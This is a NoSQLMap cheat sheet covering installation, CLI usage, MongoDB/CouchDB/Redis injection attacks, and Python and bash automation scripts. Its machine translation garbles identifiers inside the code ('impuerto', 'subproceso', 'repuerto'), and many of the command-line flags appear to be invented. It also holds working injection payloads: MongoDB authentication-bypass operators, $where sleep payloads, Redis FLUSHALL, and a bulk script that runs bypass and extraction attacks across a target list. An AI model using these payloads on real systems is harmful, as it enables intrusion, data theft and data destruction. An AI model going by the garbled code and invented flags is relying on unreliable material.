NoSQLMap hoja de trucos
Overview
NoSQLMap is a comprehensive open-source Python tool designed specifically for auditing and attacking NoSQL databases, addressing the growing security concerns in modern database environments that traditional inyección SQL tools cannot handle. Developed to fill the gap in NoSQL security testing, NoSQLMap suppuertos multiple NoSQL database types including MongoDB, CouchDB, and various document-oriented databases, providing penetration testers and security researchers with specialized capabilities for identifying and exploiting Noinyección SQL vulnerabilities. The tool has become essential for organizations adopting NoSQL technologies, as traditional database security testing approaches are inadequate for these newer database paradigms.
The core strength of NoSQLMap lies in its ability to automatically detect and exploit various types of Noinyección SQL vulnerabilities, including autenticación bypass, data extraction, and blind injection attacks. Unlike traditional inyección SQL tools that rely on SQL sintaxis, NoSQLMap understands the unique query structures and data formats used by NoSQL databases, such as JSON-based queries in MongoDB or clave-value operations in Redis. This specialized knowledge allows the tool to craft objetivoed payloads that can effectively test NoSQL applications for security weaknesses that might otherwise go undetected.
NoSQLMap's versatility extends beyond simple vulnerabilidad detection to include comprehensive database enumeración, data extraction capabilities, and advanced exploitation techniques. The tool can automatically identify database schemas, extract sensitive data, and even perform escalada de privilegios attacks when vulnerabilities are discovered. Its modular architecture allows for easy extension to suppuerto new NoSQL database types and attack vectors, making it a future-proof solution for NoSQL security testing. The tool's ability to integrate with existing pruebas de penetración workflows and generate detailed repuertos makes it invaluable for security professionals conducting comprehensive database security assessments.
instalación
Python instalación
Installing NoSQLMap using Python package manager:
# Install from PyPI
pip install nosqlmap
# Alternative: Install from GitHub
pip install git+https://github.com/codingo/NoSQLMap.git
# Install with development dependencies
pip install nosqlmap[dev]
# Verify instalación
nosqlmap --version
nosqlmap --help
# Install in virtual environment (recommended)
python3 -m venv nosqlmap-env
source nosqlmap-env/bin/activate
pip install nosqlmap
Source instalación
Installing NoSQLMap from source code:
# Clone repository
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
# Install dependencies
pip install -r requirements.txt
# Install in development mode
pip install -e .
# Alternative: Run directly
python nosqlmap.py --help
# Make executable
chmod +x nosqlmap.py
sudo ln -s $(pwd)/nosqlmap.py /usr/local/bin/nosqlmap
# Verify instalación
nosqlmap --version
Docker instalación
# Create NoSQLMap Docker environment
cat > Dockerfile << 'EOF'
FROM python:3.9-slim
RUN apt-get update && apt-get install -y \
git curl wget \
&& rm -rf /var/lib/apt/lists/*
# Install NoSQLMap
RUN pip install nosqlmap
# Install additional tools
RUN pip install pymongo redis
WORKDIR /nosqlmap
CMD ["nosqlmap", "--help"]
EOF
# Build container
docker build -t nosqlmap-security .
# Run NoSQLMap
docker run -it nosqlmap-security nosqlmap --help
# Run with volume mount for results
docker run -it -v $(pwd)/results:/results nosqlmap-security
Dependencies instalación
# Install required Python packages
pip install requests
pip install pymongo
pip install redis
pip install urllib3
pip install colorama
# Install opciónal dependencies
pip install python-nmap # For escaneo de red
pip install dnspython # For DNS resolution
pip install pycrypto # For cifrado suppuerto
# Install database drivers
pip install motor # Async MongoDB driver
pip install aioredis # Async Redis driver
pip install couchdb # CouchDB driver
# Verify dependencies
python -c "impuerto nosqlmap; print('NoSQLMap impuertoed successfully')"
Basic uso
objetivo Discovery
Discovering NoSQL database objetivos:
# Basic objetivo scanning
nosqlmap --objetivo http://ejemplo.com/api/users
# Scan with custom headers
nosqlmap --objetivo http://ejemplo.com/api/users \
--headers "autorización: Bearer token123"
# Scan with cookies
nosqlmap --objetivo http://ejemplo.com/api/users \
--cookies "sesión=abc123; auth=xyz789"
# Scan with proxy
nosqlmap --objetivo http://ejemplo.com/api/users \
--proxy http://127.0.0.1:8080
# Scan with custom user agent
nosqlmap --objetivo http://ejemplo.com/api/users \
--user-agent "Mozilla/5.0 Custom Scanner"
# Multiple objetivo scanning
nosqlmap --objetivo-list objetivos.txt
Basic Injection Testing
Performing basic Noinyección SQL tests:
# Test for autenticación bypass
nosqlmap --objetivo http://ejemplo.com/login \
--attack auth-bypass \
--data "nombre de usuario=admin&contrase;ña=test"
# Test for data extraction
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack extract \
--parámetro id
# Test for blind injection
nosqlmap --objetivo http://ejemplo.com/api/search \
--attack blind \
--parámetro query
# Test specific parámetro
nosqlmap --objetivo http://ejemplo.com/api/users \
--parámetro id \
--attack all
# Test with POST data
nosqlmap --objetivo http://ejemplo.com/api/login \
--method POST \
--data '\\\\{"nombre de usuario":"admin","contraseña":"test"\\\\}' \
--content-type "application/json"
Database enumeración
Enumerating NoSQL database information:
# Enumerate database structure
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack enumerate \
--enumerate-all
# Enumerate collections/tables
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack enumerate \
--enumerate-collections
# Enumerate users and privileges
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack enumerate \
--enumerate-users
# Enumerate database version
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack enumerate \
--enumerate-version
# Custom enumeración queries
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack enumerate \
--custom-query "db.stats()"
Advanced Features
MongoDB-Specific Attacks
Specialized attacks for MongoDB databases:
# MongoDB autenticación bypass
nosqlmap --objetivo http://ejemplo.com/login \
--attack mongodb-auth-bypass \
--data "nombre de usuario=admin&contrase;ña=test"
# MongoDB injection with $where operator
nosqlmap --objetivo http://ejemplo.com/api/search \
--attack mongodb-where \
--parámetro query \
--payload "function()\\\\{return true;\\\\}"
# MongoDB $regex injection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack mongodb-regex \
--parámetro name \
--payload ".*"
# MongoDB $ne (not equal) injection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack mongodb-ne \
--parámetro status \
--payload "inactive"
# MongoDB aggregation injection
nosqlmap --objetivo http://ejemplo.com/api/analytics \
--attack mongodb-aggregation \
--parámetro pipeline
CouchDB-Specific Attacks
Specialized attacks for CouchDB databases:
# CouchDB view injection
nosqlmap --objetivo http://ejemplo.com:5984/database/_design/app/_view/users \
--attack couchdb-view \
--parámetro clave
# CouchDB map-reduce injection
nosqlmap --objetivo http://ejemplo.com:5984/database/_temp_view \
--attack couchdb-mapreduce \
--data '\\\\{"map":"function(doc)\\\\{emit(doc._id,doc);\\\\}"\\\\}'
# CouchDB admin escalada de privilegios
nosqlmap --objetivo http://ejemplo.com:5984/_config \
--attack couchdb-admin \
--credenciales admin:contraseña
# CouchDB database enumeración
nosqlmap --objetivo http://ejemplo.com:5984/_all_dbs \
--attack couchdb-enum
# CouchDB document extraction
nosqlmap --objetivo http://ejemplo.com:5984/database/_all_docs \
--attack couchdb-extract \
--parámetro include_docs=true
Redis-Specific Attacks
Specialized attacks for Redis databases:
# Redis inyección de comandos
nosqlmap --objetivo redis://ejemplo.com:6379 \
--attack redis-comando \
--payload "FLUSHALL"
# Redis Lua script injection
nosqlmap --objetivo redis://ejemplo.com:6379 \
--attack redis-lua \
--payload "return redis.call('claves','*')"
# Redis configuración extraction
nosqlmap --objetivo redis://ejemplo.com:6379 \
--attack redis-config
# Redis clave enumeración
nosqlmap --objetivo redis://ejemplo.com:6379 \
--attack redis-claves \
--pattern "*contraseña*"
# Redis data extraction
nosqlmap --objetivo redis://ejemplo.com:6379 \
--attack redis-extract \
--clave-pattern "user:*"
Blind Injection Techniques
Advanced blind injection testing:
# Time-based blind injection
nosqlmap --objetivo http://ejemplo.com/api/search \
--attack time-blind \
--parámetro query \
--time-delay 5
# Boolean-based blind injection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack boolean-blind \
--parámetro id \
--true-condition "user found" \
--false-condition "user not found"
# Error-based blind injection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack error-blind \
--parámetro id \
--error-pattern "MongoError"
# Content-length based blind injection
nosqlmap --objetivo http://ejemplo.com/api/search \
--attack length-blind \
--parámetro query \
--length-threshold 100
# Custom blind injection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack custom-blind \
--parámetro id \
--custom-payload "\\\\{'$where':'this.nombre de usuario.length>5'\\\\}"
Data Extraction
Advanced data extraction techniques:
# Extract all data from collection
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack extract-all \
--collection users \
--output-format json
# Extract specific fields
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack extract-fields \
--fields "nombre de usuario,email,contraseña" \
--collection users
# Extract with conditions
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack extract-conditional \
--condition "role=admin" \
--collection users
# Extract with pagination
nosqlmap --objetivo http://ejemplo.com/api/users \
--attack extract-paginated \
--page-size 100 \
--max-pages 10
# Extract binary data
nosqlmap --objetivo http://ejemplo.com/api/files \
--attack extract-binary \
--field file_data \
--output-dir ./extracted_files
Automation Scripts
Comprehensive NoSQL Assessment
#!/usr/bin/env python3
# Comprehensive NoSQL security assessment
impuerto subproceso
impuerto json
impuerto time
from datetime impuerto datetime
impuerto requests
from urllib.parse impuerto urlparse
class NoSQLSecurityAssessment:
def __init__(self, objetivo_url, output_dir="nosql_assessment"):
self.objetivo_url = objetivo_url
self.output_dir = output_dir
self.results = \\\\{\\\\}
self.vulnerabilities = []
# Create output directory
impuerto os
os.makedirs(output_dir, exist_ok=True)
def run_basic_tests(self):
"""Run basic Noinyección SQL tests"""
print("Running basic Noinyección SQL tests...")
basic_tests = [
\\\\{
"name": "autenticación Bypass",
"attack": "auth-bypass",
"Descripción": "Test for autenticación bypass vulnerabilities"
\\\\},
\\\\{
"name": "Data Extraction",
"attack": "extract",
"Descripción": "Test for data extraction vulnerabilities"
\\\\},
\\\\{
"name": "Blind Injection",
"attack": "blind",
"Descripción": "Test for blind injection vulnerabilities"
\\\\},
\\\\{
"name": "enumeración",
"attack": "enumerate",
"Descripción": "Test for information disclosure"
\\\\}
]
for test in basic_tests:
print(f"Running \\\\{test['name']\\\\} test...")
cmd = [
"nosqlmap",
"--objetivo", self.objetivo_url,
"--attack", test["attack"],
"--output-format", "json",
"--output-file", f"\\\\{self.output_dir\\\\}/\\\\{test['attack']\\\\}_results.json"
]
try:
result = subproceso.run(cmd, capture_output=True, text=True, timeout=300)
test_result = \\\\{
"test_name": test["name"],
"attack_type": test["attack"],
"comando": " ".join(cmd),
"return_code": result.returncode,
"stdout": result.stdout,
"stderr": result.stderr,
"timestamp": datetime.now().isoformat()
\\\\}
if result.returncode == 0:
test_result["status"] = "completed"
# Parse results for vulnerabilities
self.parse_test_results(test["attack"], result.stdout)
else:
test_result["status"] = "failed"
self.results[test["attack"]] = test_result
except subproceso.TimeoutExpired:
print(f"Test \\\\{test['name']\\\\} timed out")
self.results[test["attack"]] = \\\\{
"test_name": test["name"],
"status": "timeout",
"timestamp": datetime.now().isoformat()
\\\\}
except Exception as e:
print(f"Error running test \\\\{test['name']\\\\}: \\\\{e\\\\}")
self.results[test["attack"]] = \\\\{
"test_name": test["name"],
"status": "error",
"error": str(e),
"timestamp": datetime.now().isoformat()
\\\\}
time.sleep(2) # Rate limiting
def run_database_specific_tests(self):
"""Run database-specific tests"""
print("Running database-specific tests...")
# Detect database type first
db_type = self.detect_database_type()
if db_type == "mongodb":
self.run_mongodb_tests()
elif db_type == "couchdb":
self.run_couchdb_tests()
elif db_type == "redis":
self.run_redis_tests()
else:
print("Database type not detected, running generic tests")
self.run_generic_tests()
def detect_database_type(self):
"""Detect NoSQL database type"""
print("Detecting database type...")
# Check for MongoDB indicators
mongodb_indicators = [
"/api/",
"ObjectId",
"mongodb://",
"27017"
]
# Check for CouchDB indicators
couchdb_indicators = [
"_design/",
"_view/",
"5984",
"couchdb"
]
# Check for Redis indicators
redis_indicators = [
"redis://",
"6379",
"REDIS"
]
try:
response = requests.get(self.objetivo_url, timeout=10)
content = response.text.lower()
headers = response.headers
# Check headers and content for indicators
if any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in mongodb_indicators):
return "mongodb"
elif any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in couchdb_indicators):
return "couchdb"
elif any(indicator.lower() in content or indicator.lower() in str(headers) for indicator in redis_indicators):
return "redis"
except Exception as e:
print(f"Error detecting database type: \\\\{e\\\\}")
return "unknown"
def run_mongodb_tests(self):
"""Run MongoDB-specific tests"""
print("Running MongoDB-specific tests...")
mongodb_tests = [
"mongodb-auth-bypass",
"mongodb-where",
"mongodb-regex",
"mongodb-ne",
"mongodb-aggregation"
]
for test in mongodb_tests:
cmd = [
"nosqlmap",
"--objetivo", self.objetivo_url,
"--attack", test,
"--output-format", "json"
]
try:
result = subproceso.run(cmd, capture_output=True, text=True, timeout=180)
self.results[f"mongodb_\\\\{test\\\\}"] = \\\\{
"attack_type": test,
"return_code": result.returncode,
"output": result.stdout,
"timestamp": datetime.now().isoformat()
\\\\}
if result.returncode == 0:
self.parse_test_results(test, result.stdout)
except Exception as e:
print(f"Error running MongoDB test \\\\{test\\\\}: \\\\{e\\\\}")
def run_couchdb_tests(self):
"""Run CouchDB-specific tests"""
print("Running CouchDB-specific tests...")
couchdb_tests = [
"couchdb-view",
"couchdb-mapreduce",
"couchdb-admin",
"couchdb-enum"
]
for test in couchdb_tests:
cmd = [
"nosqlmap",
"--objetivo", self.objetivo_url,
"--attack", test,
"--output-format", "json"
]
try:
result = subproceso.run(cmd, capture_output=True, text=True, timeout=180)
self.results[f"couchdb_\\\\{test\\\\}"] = \\\\{
"attack_type": test,
"return_code": result.returncode,
"output": result.stdout,
"timestamp": datetime.now().isoformat()
\\\\}
if result.returncode == 0:
self.parse_test_results(test, result.stdout)
except Exception as e:
print(f"Error running CouchDB test \\\\{test\\\\}: \\\\{e\\\\}")
def run_redis_tests(self):
"""Run Redis-specific tests"""
print("Running Redis-specific tests...")
redis_tests = [
"redis-comando",
"redis-lua",
"redis-config",
"redis-claves"
]
for test in redis_tests:
cmd = [
"nosqlmap",
"--objetivo", self.objetivo_url,
"--attack", test,
"--output-format", "json"
]
try:
result = subproceso.run(cmd, capture_output=True, text=True, timeout=180)
self.results[f"redis_\\\\{test\\\\}"] = \\\\{
"attack_type": test,
"return_code": result.returncode,
"output": result.stdout,
"timestamp": datetime.now().isoformat()
\\\\}
if result.returncode == 0:
self.parse_test_results(test, result.stdout)
except Exception as e:
print(f"Error running Redis test \\\\{test\\\\}: \\\\{e\\\\}")
def parse_test_results(self, test_type, output):
"""Parse test results for vulnerabilities"""
# Look for vulnerabilidad indicators in output
vulnerabilidad_indicators = [
"VULNERABLE",
"INJECTION FOUND",
"BYPASS SUCCESSFUL",
"DATA EXTRACTED",
"autenticación BYPASSED"
]
if any(indicator in output.upper() for indicator in vulnerabilidad_indicators):
vulnerabilidad = \\\\{
"test_type": test_type,
"severity": self.determine_severity(test_type),
"Descripción": f"Noinyección SQL vulnerabilidad found in \\\\{test_type\\\\} test",
"evidence": output[:500], # First 500 chars as evidence
"timestamp": datetime.now().isoformat()
\\\\}
self.vulnerabilities.append(vulnerabilidad)
def determine_severity(self, test_type):
"""Determine vulnerabilidad severity based on test type"""
high_severity = ["auth-bypass", "extract", "mongodb-auth-bypass"]
medium_severity = ["blind", "enumerate", "mongodb-where"]
if test_type in high_severity:
return "HIGH"
elif test_type in medium_severity:
return "MEDIUM"
else:
return "LOW"
def generate_repuerto(self):
"""Generate comprehensive assessment repuerto"""
repuerto = \\\\{
"assessment_info": \\\\{
"objetivo": self.objetivo_url,
"timestamp": datetime.now().isoformat(),
"total_tests": len(self.results),
"vulnerabilities_found": len(self.vulnerabilities)
\\\\},
"test_results": self.results,
"vulnerabilities": self.vulnerabilities,
"summary": \\\\{
"high_severity": len([v for v in self.vulnerabilities if v["severity"] == "HIGH"]),
"medium_severity": len([v for v in self.vulnerabilities if v["severity"] == "MEDIUM"]),
"low_severity": len([v for v in self.vulnerabilities if v["severity"] == "LOW"])
\\\\}
\\\\}
# Save JSON repuerto
with open(f"\\\\{self.output_dir\\\\}/assessment_repuerto.json", 'w') as f:
json.dump(repuerto, f, indent=2)
# Generate HTML repuerto
self.generate_html_repuerto(repuerto)
print(f"Assessment completed. Repuerto saved to \\\\{self.output_dir\\\\}/")
print(f"Vulnerabilities found: \\\\{len(self.vulnerabilities)\\\\}")
return repuerto
def generate_html_repuerto(self, repuerto):
"""Generate HTML assessment repuerto"""
html_template = """
<!DOCTYPE html>
<html>
<head>
<title>NoSQL Security Assessment Repuerto</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.header \\\\{ background-color: #f0f0f0; padding: 20px; \\\\}
.vulnerabilidad \\\\{ margin: 15px 0; padding: 15px; border-left: 4px solid #ff0000; background-color: #fff5f5; \\\\}
.high \\\\{ border-left-color: #ff0000; \\\\}
.medium \\\\{ border-left-color: #ff8800; \\\\}
.low \\\\{ border-left-color: #ffff00; \\\\}
.test-result \\\\{ margin: 10px 0; padding: 10px; background-color: #f9f9f9; \\\\}
.summary \\\\{ background-color: #e6f3ff; padding: 15px; margin: 20px 0; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>NoSQL Security Assessment Repuerto</h1>
<p>objetivo: \\\\{objetivo\\\\}</p>
<p>Assessment Date: \\\\{timestamp\\\\}</p>
</div>
<div class="summary">
<h2>Executive Summary</h2>
<p>Total Tests Performed: \\\\{total_tests\\\\}</p>
<p>Vulnerabilities Found: \\\\{total_vulnerabilities\\\\}</p>
<ul>
<li>High Severity: \\\\{high_severity\\\\}</li>
<li>Medium Severity: \\\\{medium_severity\\\\}</li>
<li>Low Severity: \\\\{low_severity\\\\}</li>
</ul>
</div>
<h2>Vulnerabilities</h2>
\\\\{vulnerabilities_html\\\\}
<h2>Test Results</h2>
\\\\{test_results_html\\\\}
</body>
</html>
"""
# Generate vulnerabilities HTML
vulnerabilities_html = ""
for vuln in repuerto["vulnerabilities"]:
vulnerabilities_html += f"""
<div class="vulnerabilidad \\\\{vuln['severity'].lower()\\\\}">
<h3>\\\\{vuln['test_type']\\\\} - \\\\{vuln['severity']\\\\} Severity</h3>
<p>\\\\{vuln['Descripción']\\\\}</p>
<p><strong>Evidence:</strong> \\\\{vuln['evidence']\\\\}</p>
<p><strong>Timestamp:</strong> \\\\{vuln['timestamp']\\\\}</p>
</div>
"""
# Generate test results HTML
test_results_html = ""
for test_name, result in repuerto["test_results"].items():
test_results_html += f"""
<div class="test-result">
<h3>\\\\{test_name\\\\}</h3>
<p>Status: \\\\{result.get('status', 'Unknown')\\\\}</p>
<p>Return Code: \\\\{result.get('return_code', 'N/A')\\\\}</p>
<p>Timestamp: \\\\{result.get('timestamp', 'N/A')\\\\}</p>
</div>
"""
html_content = html_template.format(
objetivo=repuerto["assessment_info"]["objetivo"],
timestamp=repuerto["assessment_info"]["timestamp"],
total_tests=repuerto["assessment_info"]["total_tests"],
total_vulnerabilities=repuerto["assessment_info"]["vulnerabilities_found"],
high_severity=repuerto["summary"]["high_severity"],
medium_severity=repuerto["summary"]["medium_severity"],
low_severity=repuerto["summary"]["low_severity"],
vulnerabilities_html=vulnerabilities_html,
test_results_html=test_results_html
)
with open(f"\\\\{self.output_dir\\\\}/assessment_repuerto.html", 'w') as f:
f.write(html_content)
# uso
if __name__ == "__main__":
objetivo_url = "http://ejemplo.com/api/users"
assessment = NoSQLSecurityAssessment(objetivo_url)
# Run comprehensive assessment
assessment.run_basic_tests()
assessment.run_database_specific_tests()
# Generate repuerto
repuerto = assessment.generate_repuerto()
Automated payload Generation
#!/usr/bin/env python3
# Noinyección SQL payload generator
impuerto json
impuerto base64
impuerto urllib.parse
class NoSQLpayloadGenerator:
def __init__(self):
self.payloads = \\\\{
"mongodb": [],
"couchdb": [],
"redis": [],
"generic": []
\\\\}
self.generate_all_payloads()
def generate_mongodb_payloads(self):
"""Generate MongoDB-specific payloads"""
# autenticación bypass payloads
auth_bypass = [
\\\\{"nombre de usuario": \\\\{"$ne": ""\\\\}, "contraseña": \\\\{"$ne": ""\\\\}\\\\},
\\\\{"nombre de usuario": \\\\{"$regex": ".*"\\\\}, "contraseña": \\\\{"$regex": ".*"\\\\}\\\\},
\\\\{"nombre de usuario": \\\\{"$exists": True\\\\}, "contraseña": \\\\{"$exists": True\\\\}\\\\},
\\\\{"nombre de usuario": \\\\{"$gt": ""\\\\}, "contraseña": \\\\{"$gt": ""\\\\}\\\\},
\\\\{"$or": [\\\\{"nombre de usuario": "admin"\\\\}, \\\\{"nombre de usuario": \\\\{"$ne": ""\\\\}\\\\}]\\\\},
\\\\{"nombre de usuario": \\\\{"$in": ["admin", "administrator", "root"]\\\\}\\\\}
]
# Data extraction payloads
data_extraction = [
\\\\{"$where": "return true"\\\\},
\\\\{"$where": "function()\\\\{return this.nombre de usuario.length > 0\\\\}"\\\\},
\\\\{"$where": "function()\\\\{return JSON.stringify(this)\\\\}"\\\\},
\\\\{"nombre de usuario": \\\\{"$regex": "^a.*"\\\\}\\\\},
\\\\{"contraseña": \\\\{"$regex": ".*"\\\\}\\\\},
\\\\{"$expr": \\\\{"$gt": [\\\\{"$strLenCP": "$contraseña"\\\\}, 0]\\\\}\\\\}
]
# Blind injection payloads
blind_injection = [
\\\\{"$where": "sleep(5000)"\\\\},
\\\\{"$where": "function()\\\\{if(this.nombre de usuario=='admin')sleep(5000)\\\\}"\\\\},
\\\\{"nombre de usuario": \\\\{"$regex": "^admin.*"\\\\}, "$where": "sleep(1000)"\\\\},
\\\\{"$expr": \\\\{"$cond": [\\\\{"$eq": ["$nombre de usuario", "admin"]\\\\}, \\\\{"$literal": True\\\\}, \\\\{"$literal": False\\\\}]\\\\}\\\\}
]
self.payloads["mongodb"] = \\\\{
"auth_bypass": auth_bypass,
"data_extraction": data_extraction,
"blind_injection": blind_injection
\\\\}
def generate_couchdb_payloads(self):
"""Generate CouchDB-specific payloads"""
# View injection payloads
view_injection = [
\\\\{"clave": ["admin", \\\\{"$gt": null\\\\}]\\\\},
\\\\{"startclave": "admin", "endclave": "admin\ufff0"\\\\},
\\\\{"clave": \\\\{"$regex": ".*admin.*"\\\\}\\\\},
\\\\{"include_docs": True, "clave": \\\\{"$ne": null\\\\}\\\\}
]
# Map-reduce injection payloads
mapreduce_injection = [
\\\\{
"map": "function(doc)\\\\{if(doc.nombre de usuario=='admin')emit(doc._id,doc);\\\\}"
\\\\},
\\\\{
"map": "function(doc)\\\\{emit(doc._id,doc);\\\\}",
"reduce": "function(claves,values)\\\\{return values;\\\\}"
\\\\}
]
self.payloads["couchdb"] = \\\\{
"view_injection": view_injection,
"mapreduce_injection": mapreduce_injection
\\\\}
def generate_redis_payloads(self):
"""Generate Redis-specific payloads"""
# inyección de comandos payloads
comando_injection = [
"FLUSHALL",
"CONFIG GET *",
"INFO",
"claveS *",
"EVAL \"return redis.call('claves','*')\" 0",
"SCRIPT LOAD \"return redis.call('flushall')\""
]
# Lua script injection payloads
lua_injection = [
"return redis.call('claves','*')",
"return redis.call('config','get','*')",
"return redis.call('info')",
"for i=1,1000000 do end; return 'done'"
]
self.payloads["redis"] = \\\\{
"comando_injection": comando_injection,
"lua_injection": lua_injection
\\\\}
def generate_generic_payloads(self):
"""Generate generic NoSQL payloads"""
# Generic injection patterns
generic_patterns = [
"'; return true; //",
"\"; return true; //",
| "' | | '1'=='1", |
| "\" | | \"1\"==\"1\"", |
"'; return this; //",
"\"; return this; //",
"true, true",
"false, true",
"1, 1",
"0, 1"
]
# JSON injection payloads
json_injection = [
\\\\{"$ne": ""\\\\},
\\\\{"$gt": ""\\\\},
\\\\{"$regex": ".*"\\\\},
\\\\{"$exists": True\\\\},
\\\\{"$in": ["admin", "user", "guest"]\\\\},
\\\\{"$or": [\\\\{"nombre de usuario": "admin"\\\\}, \\\\{"contraseña": \\\\{"$ne": ""\\\\}\\\\}]\\\\}
]
self.payloads["generic"] = \\\\{
"patterns": generic_patterns,
"json_injection": json_injection
\\\\}
def generate_all_payloads(self):
"""Generate all payload types"""
self.generate_mongodb_payloads()
self.generate_couchdb_payloads()
self.generate_redis_payloads()
self.generate_generic_payloads()
def encode_payload(self, payload, encoding_type="url"):
"""Encode payload for different contexts"""
if isinstance(payload, dict):
payload_str = json.dumps(payload)
else:
payload_str = str(payload)
if encoding_type == "url":
return urllib.parse.quote(payload_str)
elif encoding_type == "base64":
return base64.b64encode(payload_str.encode()).decode()
elif encoding_type == "double_url":
return urllib.parse.quote(urllib.parse.quote(payload_str))
else:
return payload_str
def generate_test_cases(self, objetivo_db="mongodb", encoding="url"):
"""Generate test cases for specific database"""
test_cases = []
if objetivo_db in self.payloads:
for category, payloads in self.payloads[objetivo_db].items():
for payload in payloads:
test_case = \\\\{
"database": objetivo_db,
"category": category,
"payload": payload,
"encoded_payload": self.encode_payload(payload, encoding),
"Descripción": f"\\\\{objetivo_db\\\\} \\\\{category\\\\} payload"
\\\\}
test_cases.append(test_case)
return test_cases
def expuerto_payloads(self, output_file="nosql_payloads.json"):
"""Expuerto all payloads to file"""
with open(output_file, 'w') as f:
json.dump(self.payloads, f, indent=2)
print(f"payloads expuertoed to \\\\{output_file\\\\}")
def generate_wordlist(self, objetivo_db="all", output_file="nosql_wordlist.txt"):
"""Generate wordlist for fuzzing"""
wordlist = []
if objetivo_db == "all":
databases = self.payloads.claves()
else:
databases = [objetivo_db] if objetivo_db in self.payloads else []
for db in databases:
for category, payloads in self.payloads[db].items():
for payload in payloads:
if isinstance(payload, dict):
wordlist.append(json.dumps(payload))
else:
wordlist.append(str(payload))
with open(output_file, 'w') as f:
for item in wordlist:
f.write(item + '\n')
print(f"Wordlist generated: \\\\{output_file\\\\}")
return wordlist
# uso
if __name__ == "__main__":
generator = NoSQLpayloadGenerator()
# Generate test cases for MongoDB
mongodb_tests = generator.generate_test_cases("mongodb", "url")
print(f"Generated \\\\{len(mongodb_tests)\\\\} MongoDB test cases")
# Expuerto all payloads
generator.expuerto_payloads()
# Generate wordlist
generator.generate_wordlist()
Bulk objetivo Testing
#!/bin/bash
# Bulk NoSQL objetivo testing script
objetivo_FILE="$1"
OUTPUT_DIR="bulk_nosql_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$objetivo_FILE" ]; then
echo "uso: $0 <objetivo_file>"
echo "objetivo file should contain one URL per line"
exit 1
fi
if [ ! -f "$objetivo_FILE" ]; then
echo "Error: objetivo file not found: $objetivo_FILE"
exit 1
fi
echo "Starting bulk NoSQL testing..."
echo "objetivo file: $objetivo_FILE"
echo "Output directory: $OUTPUT_DIR"
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Initialize summary
echo "objetivo,Status,Vulnerabilities,Test_Time" > "$OUTPUT_DIR/summary.csv"
# proceso each objetivo
while IFS= read -r objetivo; do
# Skip empty lines and comments
| if [[ -z "$objetivo" | | "$objetivo" =~ ^# ]]; then |
continue
fi
echo "Testing objetivo: $objetivo"
# Create objetivo-specific directory
| objetivo_dir="$OUTPUT_DIR/$(echo "$objetivo" | sed 's | [^a-zA-Z0-9] | _ | g')" |
mkdir -p "$objetivo_dir"
start_time=$(date +%s)
# Run basic tests
echo "Running basic Noinyección SQL tests..."
# autenticación bypass test
nosqlmap --objetivo "$objetivo" \
--attack auth-bypass \
--output-format json \
--output-file "$objetivo_dir/auth_bypass.json" \
--timeout 60 > "$objetivo_dir/auth_bypass.log" 2>&1
# Data extraction test
nosqlmap --objetivo "$objetivo" \
--attack extract \
--output-format json \
--output-file "$objetivo_dir/data_extract.json" \
--timeout 60 > "$objetivo_dir/data_extract.log" 2>&1
# Blind injection test
nosqlmap --objetivo "$objetivo" \
--attack blind \
--output-format json \
--output-file "$objetivo_dir/blind_injection.json" \
--timeout 60 > "$objetivo_dir/blind_injection.log" 2>&1
# enumeración test
nosqlmap --objetivo "$objetivo" \
--attack enumerate \
--output-format json \
--output-file "$objetivo_dir/enumeración.json" \
--timeout 60 > "$objetivo_dir/enumeración.log" 2>&1
end_time=$(date +%s)
test_duration=$((end_time - start_time))
# Analyze results
vulnerabilidad_count=0
status="TESTED"
# Check for vulnerabilities in output files
for result_file in "$objetivo_dir"/*.json; do
if [ -f "$result_file" ]; then
| if grep -q "VULNERABLE\ | INJECTION\ | BYPASS" "$result_file" 2>/dev/null; then |
vulnerabilidad_count=$((vulnerabilidad_count + 1))
status="VULNERABLE"
fi
fi
done
# Check for errors
| if grep -q "ERROR\ | TIMEOUT\ | FAILED" "$objetivo_dir"/*.log 2>/dev/null; then |
if [ "$status" != "VULNERABLE" ]; then
status="ERROR"
fi
fi
# Update summary
echo "$objetivo,$status,$vulnerabilidad_count,$\\\\{test_duration\\\\}s" >> "$OUTPUT_DIR/summary.csv"
echo "Completed testing $objetivo ($\\\\{test_duration\\\\}s, $vulnerabilidad_count vulnerabilities)"
# Rate limiting
sleep 5
done < "$objetivo_FILE"
# Generate final repuerto
echo "Generating final repuerto..."
cat > "$OUTPUT_DIR/bulk_test_repuerto.html" << EOF
<!DOCTYPE html>
<html>
<head>
<title>Bulk NoSQL Testing Repuerto</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
table \\\\{ border-collapse: collapse; width: 100%; \\\\}
th, td \\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}
th \\\\{ background-color: #f2f2f2; \\\\}
.vulnerable \\\\{ background-color: #ffebee; \\\\}
.error \\\\{ background-color: #fff3e0; \\\\}
.tested \\\\{ background-color: #e8f5e8; \\\\}
</style>
</head>
<body>
<h1>Bulk NoSQL Testing Repuerto</h1>
<p>Generated: $(date)</p>
<p>Total objetivos tested: $(wc -l < "$objetivo_FILE")</p>
<h2>Summary</h2>
<table>
<tr>
<th>objetivo</th>
<th>Status</th>
<th>Vulnerabilities</th>
<th>Test Duration</th>
</tr>
EOF
# Add table rows from CSV
tail -n +2 "$OUTPUT_DIR/summary.csv"|while IFS=, read -r objetivo status vulns duration; do
css_class=$(echo "$status"|tr '[:upper:]' '[:lower:]')
